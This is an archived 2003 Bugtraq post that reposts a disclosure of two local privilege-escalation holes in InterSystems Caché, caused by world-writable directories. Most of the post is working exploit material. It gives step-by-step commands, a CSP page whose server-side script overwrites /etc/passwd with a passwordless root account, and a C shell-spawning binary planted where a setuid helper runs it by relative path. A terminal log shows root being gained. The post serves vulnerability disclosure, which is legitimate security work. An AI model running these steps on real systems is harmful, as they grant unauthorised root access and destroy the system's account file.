Home page logo
/

bugtraq logo Bugtraq mailing list archives

Intersystems Cache database permissions vuln. BID:8070
From: <pixcrowan () hush ai>
Date: Tue, 19 Aug 2003 20:57:04 -0700

-----BEGIN PGP SIGNED MESSAGE-----

After seeing the security advisory from intersystems I found this post
from Larry Cashdollar on full-disclosure.  I didn't see it here and found
it usefull.


Larry Cashdollar wrote:



Here are more details of my research...


Vuln1

  Local attackers can exploit this to manipulate directories and binaries
inside the installation tree.  This may be used by a local malicious
user
to gain root access.   The content in /cachesys/csp/user is executed
as
root
through the web interface. user's parent directory (csp) is world
writeable allowing a local non root user to move user aside, copy its
contents and create a new writeable user directory.

1. mv /cachesys/csp/user /cachesys/csp/user.old
2. cp -rp /cachesys/csp/user /cachesys/csp/user.old
3. cp cspexp.csp /cachesys/csp/user
4. lnyx http://localhost/csp/user/cspexp.csp
5. su - cache

<------------------cspexp.csp------------->

<html>

Intersystems Cache' local root exploit.
Larry W. Cashdollar
http://vapid.dhs.org

Because of poor default file and directory permissions a localuser can
execute
code as root via the cache CSP interpreter.
<HR>
Attempting to overwrite /etc/passwd with cache::0:0:root:/root:/bin/bash.

 <script language=Cache runat=server>
     Set cdef=##class(%Library.File).%New("/etc/passwd")
     Do cdef.Open("WSN")
     Do cdef.WriteLine("cache::0:0:root:/root:/bin/bash")
     Do cdef.%Close()
    </script>

</html>


Vuln 2
- ---------
A user who is a member of the group configured at installation to start
and stop the cache database can get local root access by exploting poor
file permissions and the use of relative path names in setuid binaries.

Using the following method.

1. mv /path/to/cache/bin/cache /path/to/cache/bin/cache.orig
2. cd /path/to/cache/bin
3. cat cache.c << -EOF-
#include <stdio.h>

int main(void) {
setuid(0);setgid(0);
system("/bin/sh");
}
- -EOF-
4. gcc cache.c -o cache
5. ./cuxs

Details:

cuxs is setuid root and can be configured as executeable by a specific
group upon installation of Cache' database.

cuxs is a control program for Cache, it executes Cache using the following
system call:
execve("../bin/cache",["cache"],...
since by default bin is world write able the binary cache can be moved
and
replaced by a malicous one.

[lwc () boureguard lwc]$ cd /usr/ecache
[lwc () boureguard ecache]$ ls -ld bin;cd bin
drwxrwxrwx    2 root     root         4096 Mar 18 07:13 bin
[lwc () boureguard bin]$ mv cache cache.orig
[lwc () boureguard bin]$ gcc cache.c -o cache
[lwc () boureguard bin]$ id
uid=500(lwc) gid=500(lwc) groups=500(lwc),10(wheel)
[lwc () boureguard bin]$ ls -l cuxs
- -rwsr-x---    1 root     wheel       16488 Mar 18 06:49 cuxs
[lwc () boureguard bin]$ ./cuxs
sh-2.05a# id
uid=0(root) gid=0(root) groups=500(lwc),10(wheel)
sh-2.05a#

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

wlkEARECABkFAj9C8UQSHHBpeGNyb3dhbkBodXNoLmFpAAoJEEt8Q/lU+e2YbxkAmwVB
zBvBsvj5O6NXy9TS7T3snv7eAJ0ZoqM/eooI8rVVe7xfgml19gKinQ==
=ruGG
-----END PGP SIGNATURE-----




Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2

Free, ultra-private instant messaging with Hush Messenger
https://www.hushmail.com/services.php?subloc=messenger&l=434

Promote security and make money with the Hushmail Affiliate Program: 
https://www.hushmail.com/about.php?subloc=affiliate&l=427


  By Date           By Thread  

Current thread:
  • Intersystems Cache database permissions vuln. BID:8070 pixcrowan (Aug 21)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault